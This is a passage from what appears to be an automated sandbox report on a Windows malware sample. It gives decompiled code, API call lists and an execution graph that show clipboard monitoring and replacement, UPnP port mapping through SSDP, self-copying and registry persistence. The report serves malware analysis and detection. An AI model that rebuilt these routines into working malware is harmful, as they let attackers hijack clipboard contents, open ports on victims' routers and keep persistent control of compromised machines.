                                                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_t44 = E0040C260(_a4,  &_v8);
                                                                                                                                                                                                                                                                                    				_t89 = _t88 + 8;
                                                                                                                                                                                                                                                                                    				_v12 = _t44;
                                                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    					_t46 = E0040C000(_v12);
                                                                                                                                                                                                                                                                                    					_t90 = _t89 + 4;
                                                                                                                                                                                                                                                                                    					_v20 = _t46;
                                                                                                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    						_v24 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v24);
                                                                                                                                                                                                                                                                                    						_push(_v20);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v28);
                                                                                                                                                                                                                                                                                    							_push(_v24);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                                                                                                                                                                                                                    								_t59 = E0040CBE0(_v28);
                                                                                                                                                                                                                                                                                    								_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                                    								_v32 = _t59;
                                                                                                                                                                                                                                                                                    								if(_v32 != 0) {
                                                                                                                                                                                                                                                                                    									_t62 = E0040CAC0(_v28);
                                                                                                                                                                                                                                                                                    									_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                                    									_v36 = _t62;
                                                                                                                                                                                                                                                                                    									if(_v36 != 0) {
                                                                                                                                                                                                                                                                                    										E0040B3E0( &_v16, "%S%S", _v32);
                                                                                                                                                                                                                                                                                    										_t90 = _t90 + 0x10;
                                                                                                                                                                                                                                                                                    										__imp__#6(_v36, _v36);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00408C70(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                                                    0x0040cc36
                                                                                                                                                                                                                                                                                    0x0040cc45
                                                                                                                                                                                                                                                                                    0x0040cc4a
                                                                                                                                                                                                                                                                                    0x0040cc4d
                                                                                                                                                                                                                                                                                    0x0040cc54
                                                                                                                                                                                                                                                                                    0x0040cc5e
                                                                                                                                                                                                                                                                                    0x0040cc63
                                                                                                                                                                                                                                                                                    0x0040cc66
                                                                                                                                                                                                                                                                                    0x0040cc6d
                                                                                                                                                                                                                                                                                    0x0040cc73
                                                                                                                                                                                                                                                                                    0x0040cc7d
                                                                                                                                                                                                                                                                                    0x0040cc86
                                                                                                                                                                                                                                                                                    0x0040cc91
                                                                                                                                                                                                                                                                                    0x0040cca1
                                                                                                                                                                                                                                                                                    0x0040ccab
                                                                                                                                                                                                                                                                                    0x0040ccb4
                                                                                                                                                                                                                                                                                    0x0040ccbc
                                                                                                                                                                                                                                                                                    0x0040ccc8
                                                                                                                                                                                                                                                                                    0x0040cccd
                                                                                                                                                                                                                                                                                    0x0040ccd0
                                                                                                                                                                                                                                                                                    0x0040ccd7
                                                                                                                                                                                                                                                                                    0x0040ccdd
                                                                                                                                                                                                                                                                                    0x0040cce2
                                                                                                                                                                                                                                                                                    0x0040cce5
                                                                                                                                                                                                                                                                                    0x0040ccec
                                                                                                                                                                                                                                                                                    0x0040ccff
                                                                                                                                                                                                                                                                                    0x0040cd04
                                                                                                                                                                                                                                                                                    0x0040cd0b
                                                                                                                                                                                                                                                                                    0x0040cd0b
                                                                                                                                                                                                                                                                                    0x0040cd15
                                                                                                                                                                                                                                                                                    0x0040cd15
                                                                                                                                                                                                                                                                                    0x0040cd27
                                                                                                                                                                                                                                                                                    0x0040cd27
                                                                                                                                                                                                                                                                                    0x0040cd35
                                                                                                                                                                                                                                                                                    0x0040cd35
                                                                                                                                                                                                                                                                                    0x0040cd43
                                                                                                                                                                                                                                                                                    0x0040cd43
                                                                                                                                                                                                                                                                                    0x0040cd49
                                                                                                                                                                                                                                                                                    0x0040cd4e
                                                                                                                                                                                                                                                                                    0x0040cd57

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: memset.NTDLL ref: 0040C288
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetCrackUrlA.WININET(0040D079,00000000,10000000,0000003C), ref: 0040C2D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C2E8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C321
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C357
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C37F
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C3C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetCloseHandle.WININET(00000000), ref: 0040C457
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: SysAllocString.OLEAUT32(00000000), ref: 0040C02E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: CoCreateInstance.OLE32(00410318,00000000,00004401,00410308,00000000), ref: 0040C056
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: SysFreeString.OLEAUT32(00000000), ref: 0040C0F1
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CD0B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CD15
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                                                    • String ID: %S%S
                                                                                                                                                                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                                                    • Opcode ID: 86f6504e5494efba9a820ad851abc2735c65b1deacf7d2d6193f3942743fcb34
                                                                                                                                                                                                                                                                                    • Instruction ID: f6c0dd48525cf9db1308fcfd74a329a1c42d5f2fc6292bf47869dbcd9c674937
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86f6504e5494efba9a820ad851abc2735c65b1deacf7d2d6193f3942743fcb34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB4129B5E00109DFDB04DBE4D885AEFB7B9BF88304F104669E505B7390D738AA45CBA5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040D020() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				__imp__CoInitializeEx(0, 2);
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t20 = E0040C580( &_v12,  &_v12);
                                                                                                                                                                                                                                                                                    				_t37 = _t36 + 4;
                                                                                                                                                                                                                                                                                    				_v8 = _t20;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_t20 = E0040CC30( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                                                                                                                                                                                                                    						_t37 = _t37 + 4;
                                                                                                                                                                                                                                                                                    						 *0x416e24 = _t20;
                                                                                                                                                                                                                                                                                    						if( *0x416e24 == 0) {
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v20 = E00409540();
                                                                                                                                                                                                                                                                                    						_t31 =  *0x416e24; // 0x0
                                                                                                                                                                                                                                                                                    						E0040CFA0(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                                    						_t26 =  *0x416e24; // 0x0
                                                                                                                                                                                                                                                                                    						_t20 = E0040CFA0(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                                                                                                                                                                                                                    						_t37 = _t37 + 0x20;
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return E00408D90(_t20, _v8, _v12, _v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040d02a
                                                                                                                                                                                                                                                                                    0x0040d030
                                                                                                                                                                                                                                                                                    0x0040d03b
                                                                                                                                                                                                                                                                                    0x0040d040
                                                                                                                                                                                                                                                                                    0x0040d043
                                                                                                                                                                                                                                                                                    0x0040d04a
                                                                                                                                                                                                                                                                                    0x0040d050
                                                                                                                                                                                                                                                                                    0x0040d062
                                                                                                                                                                                                                                                                                    0x0040d074
                                                                                                                                                                                                                                                                                    0x0040d079
                                                                                                                                                                                                                                                                                    0x0040d07c
                                                                                                                                                                                                                                                                                    0x0040d088
                                                                                                                                                                                                                                                                                    0x0040d05f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d05f
                                                                                                                                                                                                                                                                                    0x0040d08f
                                                                                                                                                                                                                                                                                    0x0040d0a0
                                                                                                                                                                                                                                                                                    0x0040d0a7
                                                                                                                                                                                                                                                                                    0x0040d0bd
                                                                                                                                                                                                                                                                                    0x0040d0c3
                                                                                                                                                                                                                                                                                    0x0040d0c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d0c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d0dc
                                                                                                                                                                                                                                                                                    0x0040d0e2

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002), ref: 0040D02A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: socket.WS2_32(00000002,00000002,00000011), ref: 0040C59A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: htons.WS2_32(0000076C), ref: 0040C5D0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: inet_addr.WS2_32(239.255.255.250), ref: 0040C5DF
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C5FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: bind.WS2_32(000000FF,?,00000010), ref: 0040C633
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: lstrlenA.KERNEL32(00410578,00000000,?,00000010), ref: 0040C64C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: sendto.WS2_32(000000FF,00410578,00000000), ref: 0040C65B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C580: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C675
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040CC30: SysFreeString.OLEAUT32(00000000), ref: 0040CD0B
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040CC30: SysFreeString.OLEAUT32(00000000), ref: 0040CD15
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                                                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                                                                                                                                                                    • Opcode ID: 014f018b2ad0d604453ca6d4d42fb9b10cc54ad83f4ff0cd62ecb7ebe3116a6f
                                                                                                                                                                                                                                                                                    • Instruction ID: d6482cf8f8518ba90fc7d027882e0c52926dc77542800e56e9404f82e9eb0b53
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 014f018b2ad0d604453ca6d4d42fb9b10cc54ad83f4ff0cd62ecb7ebe3116a6f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E811E4B4D01208EBD700EFE4EC45BAE7775AB04308F10866EE505772C2E679AE45CB5A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:20.5%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                    Total number of Nodes:1450
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:32
                                                                                                                                                                                                                                                                                    execution_graph 5734 4041a0 GetWindowLongW 5735 4041c4 5734->5735 5738 4041e6 5734->5738 5736 4041d1 5735->5736 5737 404257 IsClipboardFormatAvailable 5735->5737 5740 4041f4 SetClipboardViewer SetWindowLongW 5736->5740 5741 4041d7 5736->5741 5745 404273 IsClipboardFormatAvailable 5737->5745 5746 40426a 5737->5746 5739 4041e1 5738->5739 5743 404236 5738->5743 5744 40421e SetWindowLongW 5738->5744 5742 4043d4 DefWindowProcA 5739->5742 5740->5742 5741->5739 5748 40438d RegisterRawInputDevices ChangeClipboardChain 5741->5748 5743->5739 5749 40423c SendMessageA 5743->5749 5744->5739 5745->5746 5747 404288 IsClipboardFormatAvailable 5745->5747 5750 4042a5 OpenClipboard 5746->5750 5751 40436f 5746->5751 5747->5746 5748->5742 5749->5739 5750->5751 5752 4042b5 GetClipboardData 5750->5752 5751->5739 5753 404375 SendMessageA 5751->5753 5752->5739 5754 4042cd GlobalLock 5752->5754 5753->5739 5754->5739 5755 4042e5 5754->5755 5756 4042f8 5755->5756 5757 404319 5755->5757 5759 40432e 5756->5759 5760 4042fe 5756->5760 5758 403fb0 13 API calls 5757->5758 5761 404304 GlobalUnlock CloseClipboard 5758->5761 5776 4040d0 5759->5776 5760->5761 5770 403ef0 5760->5770 5761->5751 5765 404357 5761->5765 5784 403480 lstrlenW 5765->5784 5768 408c70 _invalid_parameter 3 API calls 5769 40436c 5768->5769 5769->5751 5772 403efb 5770->5772 5771 403f01 lstrlenW 5771->5772 5773 403f14 5771->5773 5772->5771 5772->5773 5774 408b20 __aligned_recalloc_base 7 API calls 5772->5774 5775 403f31 lstrcpynW 5772->5775 5773->5761 5774->5772 5775->5772 5775->5773 5780 4040dd 5776->5780 5777 4040e3 lstrlenA 5777->5780 5782 4040f6 5777->5782 5778 403e90 2 API calls 5778->5780 5779 408b20 __aligned_recalloc_base 7 API calls 5779->5780 5780->5777 5780->5778 5780->5779 5780->5782 5783 408c70 _invalid_parameter 3 API calls 5780->5783 5821 404080 5780->5821 5782->5761 5783->5780 5791 4034b4 5784->5791 5785 403668 5785->5768 5786 40387b StrStrW 5787 403892 StrStrW 5786->5787 5788 40388e 5786->5788 5789 4038a5 5787->5789 5790 4038a9 StrStrW 5787->5790 5788->5787 5789->5790 5794 4038bc 5790->5794 5791->5785 5792 403763 StrStrW 5791->5792 5798 40367a 5791->5798 5793 40378e StrStrW 5792->5793 5792->5798 5796 4037b9 StrStrW 5793->5796 5793->5798 5794->5785 5795 403926 isalpha 5794->5795 5805 403960 5794->5805 5795->5794 5797 40393d isdigit 5795->5797 5796->5798 5797->5785 5797->5794 5798->5785 5798->5786 5799 403ccb StrStrW 5803 403ce5 StrStrW 5799->5803 5804 403cde 5799->5804 5800 403c7d StrStrW 5801 403c90 5800->5801 5802 403c97 StrStrW 5800->5802 5801->5802 5806 403cb1 StrStrW 5802->5806 5807 403caa 5802->5807 5808 403cf8 5803->5808 5809 403cff StrStrW 5803->5809 5804->5803 5805->5799 5805->5800 5806->5799 5810 403cc4 5806->5810 5807->5806 5808->5809 5811 403d12 5809->5811 5812 403d19 StrStrW 5809->5812 5810->5799 5811->5812 5813 403d33 StrStrW 5812->5813 5814 403d2c 5812->5814 5815 403d46 lstrlenA 5813->5815 5814->5813 5815->5785 5817 403e0c GlobalAlloc 5815->5817 5817->5785 5818 403e27 GlobalLock 5817->5818 5818->5785 5819 403e3a memcpy GlobalUnlock OpenClipboard 5818->5819 5819->5785 5820 403e67 EmptyClipboard SetClipboardData CloseClipboard 5819->5820 5820->5785 5822 40408b 5821->5822 5823 404091 lstrlenA 5822->5823 5824 403e90 2 API calls 5822->5824 5825 4040c4 5822->5825 5823->5822 5824->5822 5825->5780 5826 40bec0 5827 40a210 312 API calls 5826->5827 5828 40bef8 5827->5828 5829 404880 5831 40481b 5829->5831 5830 408c70 _invalid_parameter 3 API calls 5832 40488b LeaveCriticalSection 5830->5832 5831->5830 5934 40b860 5935 4098f0 4 API calls 5934->5935 5936 40b873 5935->5936 5937 40b700 312 API calls 5936->5937 5938 40b88a 5936->5938 5937->5938 5834 40c741 5835 40c74a 5834->5835 5836 40c83d 5835->5836 5837 40c7b3 lstrcmpiW 5835->5837 5838 40c833 SysFreeString 5837->5838 5839 40c7c6 5837->5839 5838->5836 5840 40c200 2 API calls 5839->5840 5842 40c7d4 5840->5842 5841 40c825 5841->5838 5842->5838 5842->5841 5843 40c803 lstrcmpiW 5842->5843 5844 40c815 5843->5844 5845 40c81b SysFreeString 5843->5845 5844->5845 5845->5841 5951 40ece8 5952 40ecf0 5951->5952 5954 40eda4 5952->5954 5957 40ef2d 5952->5957 5956 40ed29 5956->5954 5961 40ee18 RtlUnwind 5956->5961 5958 40ef42 5957->5958 5960 40ef5e 5957->5960 5959 40efcd NtQueryVirtualMemory 5958->5959 5958->5960 5959->5960 5960->5956 5962 40ee30 5961->5962 5962->5956 5846 404acc 5847 4049cc 5846->5847 5849 404ac3 5847->5849 5851 408c70 _invalid_parameter 3 API calls 5847->5851 5848 404aec 5852 408c70 _invalid_parameter 3 API calls 5848->5852 5849->5848 5850 4044e0 68 API calls 5849->5850 5850->5848 5853 404a22 5851->5853 5854 404b0d 5852->5854 5855 408ce0 8 API calls 5853->5855 5856 404b1c CreateFileW 5854->5856 5857 404bae LeaveCriticalSection 5854->5857 5858 404a32 5855->5858 5856->5857 5859 404b3f 5856->5859 5860 408c70 _invalid_parameter 3 API calls 5858->5860 5862 404b9a FlushFileBuffers CloseHandle 5859->5862 5863 404b5c WriteFile 5859->5863 5861 404a59 5860->5861 5864 40ab80 7 API calls 5861->5864 5862->5857 5863->5859 5865 404a90 5864->5865 5866 405c90 65 API calls 5865->5866 5866->5849 5867 408d4e 5868 408c70 _invalid_parameter 3 API calls 5867->5868 5871 408d0d 5868->5871 5869 408d22 5870 408b20 __aligned_recalloc_base 7 API calls 5870->5871 5871->5869 5871->5870 5872 408d24 memcpy 5871->5872 5872->5871 4313 405e10 Sleep 4314 405e38 4313->4314 4315 405e46 PathFileExistsW 4314->4315 4316 405e98 CreateMutexA GetLastError 4314->4316 4315->4314 4317 405e55 CopyFileW MoveFileA MoveFileW 4315->4317 4318 405ec2 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4316->4318 4319 405eba ExitProcess 4316->4319 4317->4314 4320 405f4d 4318->4320 4321 405fd7 4320->4321 4322 40623a Sleep RegOpenKeyExA 4320->4322 4449 40d0f0 GetLocaleInfoA 4321->4449 4324 406351 RegOpenKeyExA 4322->4324 4325 40626b 8 API calls 4322->4325 4327 406377 8 API calls 4324->4327 4328 40645d Sleep 4324->4328 4325->4324 4327->4328 4369 40b1c0 4328->4369 4330 405fe4 ExitProcess 4331 405fec ExpandEnvironmentStringsW wsprintfW CopyFileW 4333 406040 SetFileAttributesW RegOpenKeyExW 4331->4333 4334 406119 Sleep wsprintfW CopyFileW 4331->4334 4337 4060fa 4333->4337 4341 406075 4333->4341 4334->4322 4336 406161 SetFileAttributesW RegOpenKeyExW 4334->4336 4335 406478 9 API calls 4372 4045f0 InitializeCriticalSection CreateFileW 4335->4372 5628 4043f0 4335->5628 5637 4054a0 Sleep GetModuleFileNameW 4335->5637 5652 405cf0 4335->5652 4339 40621b 4336->4339 4345 406196 4336->4345 4451 40d390 memset CreateProcessW 4337->4451 4346 40d390 5 API calls 4339->4346 4340 4065c5 4341->4341 4347 4060b1 RegSetValueExW RegCloseKey 4341->4347 4345->4345 4350 4061d2 RegSetValueExW RegCloseKey 4345->4350 4351 406227 4346->4351 4347->4337 4348 406111 ExitProcess 4350->4339 4351->4322 4353 406232 ExitProcess 4351->4353 4355 40652d CreateEventA 4404 40a8f0 4355->4404 4364 40bba0 312 API calls 4365 40658d 4364->4365 4366 40bba0 312 API calls 4365->4366 4367 4065a9 4366->4367 4368 40bba0 312 API calls 4367->4368 4368->4340 4457 40b190 4369->4457 4373 404715 4372->4373 4374 404628 CreateFileMappingW 4372->4374 4386 40d020 CoInitializeEx 4373->4386 4375 404649 MapViewOfFile 4374->4375 4376 40470b CloseHandle 4374->4376 4377 404701 CloseHandle 4375->4377 4378 404668 GetFileSize 4375->4378 4376->4373 4377->4376 4385 40467d 4378->4385 4379 4046f7 UnmapViewOfFile 4379->4377 4381 40468c 4381->4379 4382 4046bc 4383 408c70 _invalid_parameter 3 API calls 4382->4383 4383->4381 4385->4379 4385->4381 4385->4382 4586 40b210 4385->4586 4593 4044e0 4385->4593 4894 40c580 socket 4386->4894 4388 406528 4399 405ba0 CoInitializeEx SysAllocString 4388->4399 4391 40d08a 4919 409540 htons 4391->4919 4392 40d040 4392->4388 4392->4391 4398 40d0c8 4392->4398 4904 40cc30 4392->4904 4397 40cfa0 24 API calls 4397->4398 4938 408d90 4398->4938 4400 405bc2 4399->4400 4401 405bd8 CoUninitialize 4399->4401 5083 405910 4400->5083 4401->4355 5092 40a8b0 4404->5092 4407 40a8b0 3 API calls 4408 40a90e 4407->4408 4409 40a8b0 3 API calls 4408->4409 4410 40a91e 4409->4410 4411 40a8b0 3 API calls 4410->4411 4412 406545 4411->4412 4413 40baf0 4412->4413 4414 408b00 7 API calls 4413->4414 4415 40bafb 4414->4415 4416 40654f 4415->4416 4417 40bb07 InitializeCriticalSection 4415->4417 4418 409d40 InitializeCriticalSection 4416->4418 4417->4416 4423 409d5a 4418->4423 4419 409d89 CreateFileW 4420 409db0 CreateFileMappingW 4419->4420 4421 409e72 4419->4421 4425 409dd1 MapViewOfFile 4420->4425 4426 409e68 CloseHandle 4420->4426 5135 409750 EnterCriticalSection 4421->5135 4423->4419 5099 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 4423->5099 5100 409a30 4423->5100 4429 409dec GetFileSize 4425->4429 4430 409e5e CloseHandle 4425->4430 4426->4421 4428 409e77 4431 40bba0 312 API calls 4428->4431 4436 409e0b 4429->4436 4430->4426 4432 406559 4431->4432 4437 40bba0 4432->4437 4433 409e54 UnmapViewOfFile 4433->4430 4435 409a30 28 API calls 4435->4436 4436->4433 4436->4435 5138 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 4436->5138 4438 40bbb7 EnterCriticalSection 4437->4438 4439 406572 4437->4439 5159 40bb20 4438->5159 4439->4364 4442 40bc7b LeaveCriticalSection 4442->4439 4443 408b60 9 API calls 4444 40bbf9 4443->4444 4444->4442 4445 40bc0b CreateThread 4444->4445 4445->4442 4446 40bc2e 4445->4446 5164 409620 4445->5164 5170 40baa0 4445->5170 5176 40b8a0 4445->5176 5182 40e400 GetTickCount WaitForSingleObject 4445->5182 5205 40bf10 4445->5205 5215 40bfb0 4445->5215 5221 40ea30 GetQueuedCompletionStatus 4445->5221 4447 40bc52 GetCurrentProcess GetCurrentProcess DuplicateHandle 4446->4447 4448 40bc74 4446->4448 4447->4448 4448->4442 4450 405fdc 4449->4450 4450->4330 4450->4331 4452 40d3f0 Sleep 4451->4452 4453 40d3ff ShellExecuteW 4451->4453 4454 406106 4452->4454 4455 40d434 4453->4455 4456 40d425 Sleep 4453->4456 4454->4334 4454->4348 4455->4454 4456->4454 4460 40b130 4457->4460 4461 40b163 4460->4461 4462 40b14e 4460->4462 4464 40646d 4461->4464 4466 40af60 4461->4466 4500 40ade0 4462->4500 4464->4335 4464->4340 4467 40af89 4466->4467 4470 40b03a 4466->4470 4468 40b032 4467->4468 4526 408b00 4467->4526 4468->4464 4470->4468 4472 408b00 7 API calls 4470->4472 4473 40b05e 4472->4473 4473->4468 4476 401000 7 API calls 4473->4476 4478 40b082 4476->4478 4477 408b00 7 API calls 4479 40afd2 4477->4479 4480 408b00 7 API calls 4478->4480 4534 4011e0 4479->4534 4481 40b091 4480->4481 4483 4011e0 10 API calls 4481->4483 4486 40b0ba 4483->4486 4484 40affb 4537 408c70 4484->4537 4488 408c70 _invalid_parameter 3 API calls 4486->4488 4490 40b0c6 4488->4490 4489 401000 7 API calls 4491 40b018 4489->4491 4492 401000 7 API calls 4490->4492 4493 4011e0 10 API calls 4491->4493 4494 40b0d7 4492->4494 4493->4468 4495 4011e0 10 API calls 4494->4495 4496 40b0f1 4495->4496 4497 401000 7 API calls 4496->4497 4498 40b102 4497->4498 4499 4011e0 10 API calls 4498->4499 4499->4468 4501 40ae92 4500->4501 4502 40ae09 4500->4502 4504 408b00 7 API calls 4501->4504 4525 40ae8a 4501->4525 4503 408b00 7 API calls 4502->4503 4502->4525 4505 40ae1c 4503->4505 4506 40aeb8 4504->4506 4507 401000 7 API calls 4505->4507 4505->4525 4508 401000 7 API calls 4506->4508 4506->4525 4509 40ae45 4507->4509 4510 40aee5 4508->4510 4511 4011e0 10 API calls 4509->4511 4512 4011e0 10 API calls 4510->4512 4513 40ae5f 4511->4513 4514 40aeff 4512->4514 4515 401000 7 API calls 4513->4515 4516 401000 7 API calls 4514->4516 4517 40ae70 4515->4517 4518 40af10 4516->4518 4519 4011e0 10 API calls 4517->4519 4520 4011e0 10 API calls 4518->4520 4519->4525 4521 40af2a 4520->4521 4522 401000 7 API calls 4521->4522 4523 40af3b 4522->4523 4524 4011e0 10 API calls 4523->4524 4524->4525 4525->4464 4544 408a60 4526->4544 4529 401000 4565 408b20 4529->4565 4572 4010c0 4534->4572 4536 4011ff _invalid_parameter 4536->4484 